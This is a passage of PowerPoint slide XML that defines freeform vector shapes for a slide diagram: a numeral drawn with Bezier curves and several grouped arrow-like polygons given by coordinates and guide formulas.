                  <a:gd name="T44" fmla="*/ 1 w 115"/>
                  <a:gd name="T45" fmla="*/ 139 h 194"/>
                  <a:gd name="T46" fmla="*/ 37 w 115"/>
                  <a:gd name="T47" fmla="*/ 139 h 194"/>
                  <a:gd name="T48" fmla="*/ 43 w 115"/>
                  <a:gd name="T49" fmla="*/ 157 h 194"/>
                  <a:gd name="T50" fmla="*/ 57 w 115"/>
                  <a:gd name="T51" fmla="*/ 165 h 194"/>
                  <a:gd name="T52" fmla="*/ 72 w 115"/>
                  <a:gd name="T53" fmla="*/ 157 h 194"/>
                  <a:gd name="T54" fmla="*/ 78 w 115"/>
                  <a:gd name="T55" fmla="*/ 138 h 194"/>
                  <a:gd name="T56" fmla="*/ 72 w 115"/>
                  <a:gd name="T57" fmla="*/ 116 h 194"/>
                  <a:gd name="T58" fmla="*/ 56 w 115"/>
                  <a:gd name="T59" fmla="*/ 109 h 194"/>
                  <a:gd name="T60" fmla="*/ 37 w 115"/>
                  <a:gd name="T61" fmla="*/ 109 h 194"/>
                  <a:gd name="T62" fmla="*/ 37 w 115"/>
                  <a:gd name="T63" fmla="*/ 81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5" h="194">
                    <a:moveTo>
                      <a:pt x="37" y="81"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="81"/>
                      <a:pt x="56" y="81"/>
                      <a:pt x="56" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="81"/>
                      <a:pt x="67" y="78"/>
                      <a:pt x="71" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="69"/>
                      <a:pt x="75" y="62"/>
                      <a:pt x="75" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="47"/>
                      <a:pt x="74" y="41"/>
                      <a:pt x="71" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="31"/>
                      <a:pt x="63" y="29"/>
                      <a:pt x="57" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="29"/>
                      <a:pt x="48" y="31"/>
                      <a:pt x="44" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="39"/>
                      <a:pt x="39" y="45"/>
                      <a:pt x="39" y="51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3" y="36"/>
                      <a:pt x="8" y="23"/>
                      <a:pt x="18" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="4"/>
                      <a:pt x="41" y="0"/>
                      <a:pt x="56" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="0"/>
                      <a:pt x="87" y="4"/>
                      <a:pt x="97" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="23"/>
                      <a:pt x="112" y="36"/>
                      <a:pt x="112" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="62"/>
                      <a:pt x="110" y="70"/>
                      <a:pt x="106" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="85"/>
                      <a:pt x="95" y="90"/>
                      <a:pt x="87" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="98"/>
                      <a:pt x="103" y="104"/>
                      <a:pt x="108" y="111"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="119"/>
                      <a:pt x="115" y="128"/>
                      <a:pt x="115" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="156"/>
                      <a:pt x="109" y="169"/>
                      <a:pt x="98" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="189"/>
                      <a:pt x="73" y="194"/>
                      <a:pt x="56" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="194"/>
                      <a:pt x="27" y="189"/>
                      <a:pt x="17" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="171"/>
                      <a:pt x="0" y="158"/>
                      <a:pt x="1" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="139"/>
                      <a:pt x="1" y="139"/>
                      <a:pt x="1" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="139"/>
                      <a:pt x="37" y="139"/>
                      <a:pt x="37" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="147"/>
                      <a:pt x="39" y="153"/>
                      <a:pt x="43" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="162"/>
                      <a:pt x="51" y="165"/>
                      <a:pt x="57" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="165"/>
                      <a:pt x="68" y="162"/>
                      <a:pt x="72" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="153"/>
                      <a:pt x="78" y="146"/>
                      <a:pt x="78" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="128"/>
                      <a:pt x="76" y="121"/>
                      <a:pt x="72" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="112"/>
                      <a:pt x="63" y="109"/>
                      <a:pt x="56" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="109"/>
                      <a:pt x="37" y="109"/>
                      <a:pt x="37" y="109"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="37" y="8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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="59" name="Group 58"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6689747" y="2796314"/>
              <a:ext cx="960664" cy="592366"/>
              <a:chOff x="6689747" y="2796314"/>
              <a:chExt cx="960664" cy="592366"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Freeform 7"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6689747" y="2796314"/>
                <a:ext cx="960664" cy="592366"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 427 w 686"/>
                  <a:gd name="T1" fmla="*/ 423 h 423"/>
                  <a:gd name="T2" fmla="*/ 218 w 686"/>
                  <a:gd name="T3" fmla="*/ 423 h 423"/>
                  <a:gd name="T4" fmla="*/ 0 w 686"/>
                  <a:gd name="T5" fmla="*/ 0 h 423"/>
                  <a:gd name="T6" fmla="*/ 427 w 686"/>
                  <a:gd name="T7" fmla="*/ 0 h 423"/>
                  <a:gd name="T8" fmla="*/ 686 w 686"/>
                  <a:gd name="T9" fmla="*/ 210 h 423"/>
                  <a:gd name="T10" fmla="*/ 427 w 686"/>
                  <a:gd name="T11" fmla="*/ 423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86" h="423">
                    <a:moveTo>
                      <a:pt x="427" y="423"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="218" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="423"/>
                    </a:ln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Freeform 8"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6706552" y="2829923"/>
                <a:ext cx="890645" cy="523747"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 636"/>
                  <a:gd name="T1" fmla="*/ 0 h 374"/>
                  <a:gd name="T2" fmla="*/ 407 w 636"/>
                  <a:gd name="T3" fmla="*/ 0 h 374"/>
                  <a:gd name="T4" fmla="*/ 636 w 636"/>
                  <a:gd name="T5" fmla="*/ 186 h 374"/>
                  <a:gd name="T6" fmla="*/ 407 w 636"/>
                  <a:gd name="T7" fmla="*/ 374 h 374"/>
                  <a:gd name="T8" fmla="*/ 192 w 636"/>
                  <a:gd name="T9" fmla="*/ 374 h 374"/>
                  <a:gd name="T10" fmla="*/ 0 w 636"/>
                  <a:gd name="T11" fmla="*/ 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36" h="374">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="407" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="3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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="61" name="Group 60"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5149324" y="2014895"/>
              <a:ext cx="1054490" cy="642780"/>
              <a:chOff x="5149324" y="2014895"/>
              <a:chExt cx="1054490" cy="642780"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Freeform 5"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5149324" y="2014895"/>
                <a:ext cx="1054490" cy="642780"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 278 w 753"/>
                  <a:gd name="T1" fmla="*/ 459 h 459"/>
                  <a:gd name="T2" fmla="*/ 475 w 753"/>
                  <a:gd name="T3" fmla="*/ 459 h 459"/>
                  <a:gd name="T4" fmla="*/ 753 w 753"/>
                  <a:gd name="T5" fmla="*/ 0 h 459"/>
                  <a:gd name="T6" fmla="*/ 278 w 753"/>
                  <a:gd name="T7" fmla="*/ 0 h 459"/>
                  <a:gd name="T8" fmla="*/ 0 w 753"/>
                  <a:gd name="T9" fmla="*/ 214 h 459"/>
                  <a:gd name="T10" fmla="*/ 278 w 753"/>
                  <a:gd name="T11" fmla="*/ 459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3" h="459">
                    <a:moveTo>
                      <a:pt x="278" y="459"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="475" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="459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" name="Freeform 6"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5199738" y="2044303"/>
                <a:ext cx="985871" cy="585364"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 252 w 704"/>
                  <a:gd name="T1" fmla="*/ 418 h 418"/>
                  <a:gd name="T2" fmla="*/ 0 w 704"/>
                  <a:gd name="T3" fmla="*/ 194 h 418"/>
                  <a:gd name="T4" fmla="*/ 251 w 704"/>
                  <a:gd name="T5" fmla="*/ 0 h 418"/>
                  <a:gd name="T6" fmla="*/ 704 w 704"/>
                  <a:gd name="T7" fmla="*/ 0 h 418"/>
                  <a:gd name="T8" fmla="*/ 452 w 704"/>
                  <a:gd name="T9" fmla="*/ 418 h 418"/>
                  <a:gd name="T10" fmla="*/ 252 w 704"/>
                  <a:gd name="T11" fmla="*/ 418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4" h="418">
                    <a:moveTo>
                      <a:pt x="252" y="418"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="418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57" name="Group 56"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7441754" y="4331144"/>
              <a:ext cx="1013878" cy="614772"/>
              <a:chOff x="7441754" y="4331144"/>
              <a:chExt cx="1013878" cy="614772"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Freeform 9"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7441754" y="4331144"/>
                <a:ext cx="1013878" cy="614772"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 465 w 724"/>
                  <a:gd name="T1" fmla="*/ 438 h 439"/>
                  <a:gd name="T2" fmla="*/ 218 w 724"/>
                  <a:gd name="T3" fmla="*/ 439 h 439"/>
                  <a:gd name="T4" fmla="*/ 0 w 724"/>
                  <a:gd name="T5" fmla="*/ 0 h 439"/>
                  <a:gd name="T6" fmla="*/ 465 w 724"/>
                  <a:gd name="T7" fmla="*/ 0 h 439"/>
                  <a:gd name="T8" fmla="*/ 724 w 724"/>
                  <a:gd name="T9" fmla="*/ 217 h 439"/>
                  <a:gd name="T10" fmla="*/ 465 w 724"/>
                  <a:gd name="T11" fmla="*/ 438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4" h="439">
                    <a:moveTo>
                      <a:pt x="465" y="438"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="218" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="438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" name="Freeform 10"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7459959" y="4366153"/>
                <a:ext cx="942459" cy="543352"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 673"/>
                  <a:gd name="T1" fmla="*/ 0 h 388"/>
                  <a:gd name="T2" fmla="*/ 444 w 673"/>
                  <a:gd name="T3" fmla="*/ 0 h 388"/>
                  <a:gd name="T4" fmla="*/ 673 w 673"/>
                  <a:gd name="T5" fmla="*/ 193 h 388"/>
                  <a:gd name="T6" fmla="*/ 444 w 673"/>
                  <a:gd name="T7" fmla="*/ 388 h 388"/>
                  <a:gd name="T8" fmla="*/ 192 w 673"/>
                  <a:gd name="T9" fmla="*/ 388 h 388"/>
                  <a:gd name="T10" fmla="*/ 0 w 673"/>
                  <a:gd name="T11" fmla="*/ 0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3" h="388">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="444" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="444" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="3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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr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4429526" y="2014895"/>
              <a:ext cx="3753031" cy="4082143"/>
              <a:chOff x="4429526" y="2014895"/>
              <a:chExt cx="3753031" cy="4082143"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Freeform 15"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5814507" y="2014895"/>
                <a:ext cx="389307" cy="642780"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 201 w 278"/>
                  <a:gd name="T1" fmla="*/ 420 h 459"/>
                  <a:gd name="T2" fmla="*/ 278 w 278"/>
                  <a:gd name="T3" fmla="*/ 0 h 459"/>
                  <a:gd name="T4" fmla="*/ 0 w 278"/>
                  <a:gd name="T5" fmla="*/ 459 h 459"/>
                  <a:gd name="T6" fmla="*/ 201 w 278"/>
                  <a:gd name="T7" fmla="*/ 420 h 459"/>
                  <a:gd name="T8" fmla="*/ 201 w 278"/>
                  <a:gd name="T9" fmla="*/ 420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8" h="459">
                    <a:moveTo>
                      <a:pt x="201" y="420"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="278" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="420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" name="Freeform 16"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5877524" y="2196946"/>
                <a:ext cx="260472" cy="420118"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 186 w 186"/>
                  <a:gd name="T1" fmla="*/ 0 h 300"/>
                  <a:gd name="T2" fmla="*/ 134 w 186"/>
                  <a:gd name="T3" fmla="*/ 273 h 300"/>
                  <a:gd name="T4" fmla="*/ 0 w 186"/>
                  <a:gd name="T5" fmla="*/ 300 h 300"/>
                  <a:gd name="T6" fmla="*/ 186 w 186"/>
                  <a:gd name="T7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6" h="300">
                    <a:moveTo>
                      <a:pt x="186" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="134" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186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Freeform 17"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6095984" y="2014895"/>
                <a:ext cx="481732" cy="623174"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 344"/>
                  <a:gd name="T1" fmla="*/ 420 h 445"/>
                  <a:gd name="T2" fmla="*/ 77 w 344"/>
                  <a:gd name="T3" fmla="*/ 0 h 445"/>
                  <a:gd name="T4" fmla="*/ 344 w 344"/>
                  <a:gd name="T5" fmla="*/ 445 h 445"/>
                  <a:gd name="T6" fmla="*/ 0 w 344"/>
                  <a:gd name="T7" fmla="*/ 420 h 445"/>
                  <a:gd name="T8" fmla="*/ 0 w 344"/>
                  <a:gd name="T9" fmla="*/ 420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4" h="445">
                    <a:moveTo>
                      <a:pt x="0" y="420"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="77" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="420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" name="Freeform 18"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6133794" y="2108721"/>
                <a:ext cx="385106" cy="495739"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 275"/>
                  <a:gd name="T1" fmla="*/ 334 h 354"/>
                  <a:gd name="T2" fmla="*/ 62 w 275"/>
                  <a:gd name="T3" fmla="*/ 0 h 354"/>
                  <a:gd name="T4" fmla="*/ 275 w 275"/>
                  <a:gd name="T5" fmla="*/ 354 h 354"/>
                  <a:gd name="T6" fmla="*/ 0 w 275"/>
                  <a:gd name="T7" fmla="*/ 334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354">
                    <a:moveTo>
                      <a:pt x="0" y="334"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="62" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="334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" name="Freeform 19"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5814507" y="2603060"/>
                <a:ext cx="763210" cy="85424"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 201 w 545"/>
                  <a:gd name="T1" fmla="*/ 0 h 61"/>
                  <a:gd name="T2" fmla="*/ 545 w 545"/>
                  <a:gd name="T3" fmla="*/ 25 h 61"/>
                  <a:gd name="T4" fmla="*/ 351 w 545"/>
                  <a:gd name="T5" fmla="*/ 61 h 61"/>
                  <a:gd name="T6" fmla="*/ 0 w 545"/>
                  <a:gd name="T7" fmla="*/ 39 h 61"/>
                  <a:gd name="T8" fmla="*/ 201 w 545"/>
                  <a:gd name="T9" fmla="*/ 0 h 61"/>
                  <a:gd name="T10" fmla="*/ 201 w 545"/>
                  <a:gd name="T1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5" h="61">
                    <a:moveTo>
                      <a:pt x="201" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="545" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="0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20"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5453207" y="3363473"/>
                <a:ext cx="1541823" cy="61617"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 376 w 1101"/>
                  <a:gd name="T1" fmla="*/ 0 h 44"/>
                  <a:gd name="T2" fmla="*/ 1101 w 1101"/>
                  <a:gd name="T3" fmla="*/ 18 h 44"/>
                  <a:gd name="T4" fmla="*/ 674 w 1101"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 0 w 1101"/>
                  <a:gd name="T7" fmla="*/ 29 h 44"/>
                  <a:gd name="T8" fmla="*/ 376 w 1101"/>
                  <a:gd name="T9" fmla="*/ 0 h 44"/>
                  <a:gd name="T10" fmla="*/ 376 w 1101"/>
                  <a:gd name="T1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01" h="44">
                    <a:moveTo>
                      <a:pt x="376" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1101" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="674" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="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Freeform 21"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5453207" y="2754302"/>
                <a:ext cx="616169" cy="649782"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 376 w 440"/>
                  <a:gd name="T1" fmla="*/ 435 h 464"/>
                  <a:gd name="T2" fmla="*/ 440 w 440"/>
                  <a:gd name="T3" fmla="*/ 0 h 464"/>
                  <a:gd name="T4" fmla="*/ 199 w 440"/>
                  <a:gd name="T5" fmla="*/ 48 h 464"/>
                  <a:gd name="T6" fmla="*/ 0 w 440"/>
                  <a:gd name="T7" fmla="*/ 464 h 464"/>
                  <a:gd name="T8" fmla="*/ 376 w 440"/>
                  <a:gd name="T9" fmla="*/ 435 h 464"/>
                  <a:gd name="T10" fmla="*/ 376 w 440"/>
                  <a:gd name="T11" fmla="*/ 435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0" h="464">
                    <a:moveTo>
                      <a:pt x="376" y="435"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="440" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="464"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="435"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:cu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Freeform 22"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5509223" y="2797714"/>
                <a:ext cx="519543" cy="568559"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 177 w 371"/>
                  <a:gd name="T1" fmla="*/ 38 h 406"/>
                  <a:gd name="T2" fmla="*/ 371 w 371"/>
                  <a:gd name="T3" fmla="*/ 0 h 406"/>
                  <a:gd name="T4" fmla="*/ 315 w 371"/>
                  <a:gd name="T5" fmla="*/ 381 h 406"/>
                  <a:gd name="T6" fmla="*/ 0 w 371"/>
                  <a:gd name="T7" fmla="*/ 406 h 406"/>
                  <a:gd name="T8" fmla="*/ 177 w 371"/>
                  <a:gd name="T9" fmla="*/ 38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1" h="406">
                    <a:moveTo>
                      <a:pt x="177" y="38"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="371" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="38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Freeform 23"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5979752" y="2754302"/>
                <a:ext cx="1015279" cy="634378"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 725"/>
                  <a:gd name="T1" fmla="*/ 435 h 453"/>
                  <a:gd name="T2" fmla="*/ 64 w 725"/>
                  <a:gd name="T3" fmla="*/ 0 h 453"/>
                  <a:gd name="T4" fmla="*/ 507 w 725"/>
                  <a:gd name="T5" fmla="*/ 30 h 453"/>
                  <a:gd name="T6" fmla="*/ 725 w 725"/>
                  <a:gd name="T7" fmla="*/ 453 h 453"/>
                  <a:gd name="T8" fmla="*/ 0 w 725"/>
                  <a:gd name="T9" fmla="*/ 435 h 453"/>
                  <a:gd name="T10" fmla="*/ 0 w 725"/>
                  <a:gd name="T11" fmla="*/ 435 h 4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5" h="453">
                    <a:moveTo>
                      <a:pt x="0" y="435"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="64" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="435"/>
                    </a:ln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Freeform 24"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6017562" y="2792113"/>
                <a:ext cx="920053" cy="561557"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 657"/>
                  <a:gd name="T1" fmla="*/ 384 h 401"/>
                  <a:gd name="T2" fmla="*/ 57 w 657"/>
                  <a:gd name="T3" fmla="*/ 0 h 401"/>
                  <a:gd name="T4" fmla="*/ 465 w 657"/>
                  <a:gd name="T5" fmla="*/ 26 h 401"/>
                  <a:gd name="T6" fmla="*/ 657 w 657"/>
                  <a:gd name="T7" fmla="*/ 401 h 401"/>
                  <a:gd name="T8" fmla="*/ 0 w 657"/>
                  <a:gd name="T9" fmla="*/ 384 h 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7" h="401">
                    <a:moveTo>
                      <a:pt x="0" y="384"/>
